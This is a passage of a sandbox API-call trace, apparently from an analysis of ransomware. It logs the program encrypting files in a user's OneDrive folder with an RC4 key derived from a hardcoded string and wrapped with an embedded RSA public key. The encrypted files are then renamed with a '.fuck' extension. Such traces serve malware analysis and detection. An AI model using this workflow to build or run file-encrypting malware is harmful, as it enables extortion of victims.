hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.128] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x172, lpOverlapped=0x0) returned 1 [0271.128] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x172, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x180) returned 1 [0271.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x180, lpOverlapped=0x0) returned 1 [0271.128] CloseHandle (hObject=0x5d3c) returned 1 [0271.128] CloseHandle (hObject=0x5d48) returned 1 [0271.128] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png"), bFailIfExists=0) returned 1 [0271.132] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png", dwFileAttributes=0x0) returned 1 [0271.133] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png.gsg")) returned 1 [0271.134] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png.fuck")) returned 1 [0271.136] CryptDestroyHash (hHash=0x2fa948) returned 1 [0271.136] CryptDestroyKey (hKey=0x2fa348) returned 1 [0271.136] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.136] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.136] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0271.136] GetLastError () returned 0x0 [0271.136] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat")) returned 0x20 [0271.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat", dwFileAttributes=0x80) returned 1 [0271.137] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.138] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.139] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.gsg", dwFileAttributes=0x2) returned 1 [0271.140] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0271.142] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0271.142] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.143] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.143] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa6c8) returned 1 [0271.143] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0271.143] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26bc0) returned 1 [0271.143] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26bc0, dwCertEncodingType=0x1, pInfo=0x2f31660*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31690*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31698*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa608) returned 1 [0271.143] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0271.144] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f274c8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f274c8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0271.144] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f274c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f274c8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0271.147] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.149] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.149] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.151] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.152] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.152] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.152] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.152] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.153] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.153] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.153] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.153] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.153] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.153] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x1da, lpOverlapped=0x0) returned 1 [0271.153] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1da, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1e0) returned 1 [0271.153] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x1e0, lpOverlapped=0x0) returned 1 [0271.153] CloseHandle (hObject=0x5d48) returned 1 [0271.153] CloseHandle (hObject=0x5d3c) returned 1 [0271.154] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat"), bFailIfExists=0) returned 1 [0271.157] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat", dwFileAttributes=0x0) returned 1 [0271.157] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat.gsg")) returned 1 [0271.159] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat.fuck")) returned 1 [0271.162] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0271.162] CryptDestroyKey (hKey=0x2fa6c8) returned 1 [0271.162] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.162] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.163] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.163] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0271.163] GetLastError () returned 0x0 [0271.163] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml")) returned 0x20 [0271.164] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml", dwFileAttributes=0x80) returned 1 [0271.164] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.165] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.167] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.gsg", dwFileAttributes=0x2) returned 1 [0271.168] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0271.171] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0271.171] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.171] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.171] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa948) returned 1 [0271.171] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.171] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0271.171] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26c48) returned 1 [0271.172] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26c48, dwCertEncodingType=0x1, pInfo=0x2f32290*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f322c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f322c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa348) returned 1 [0271.172] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0271.172] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27550*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27550*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0271.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f27550*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27550*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0271.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.180] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.188] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.189] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.190] 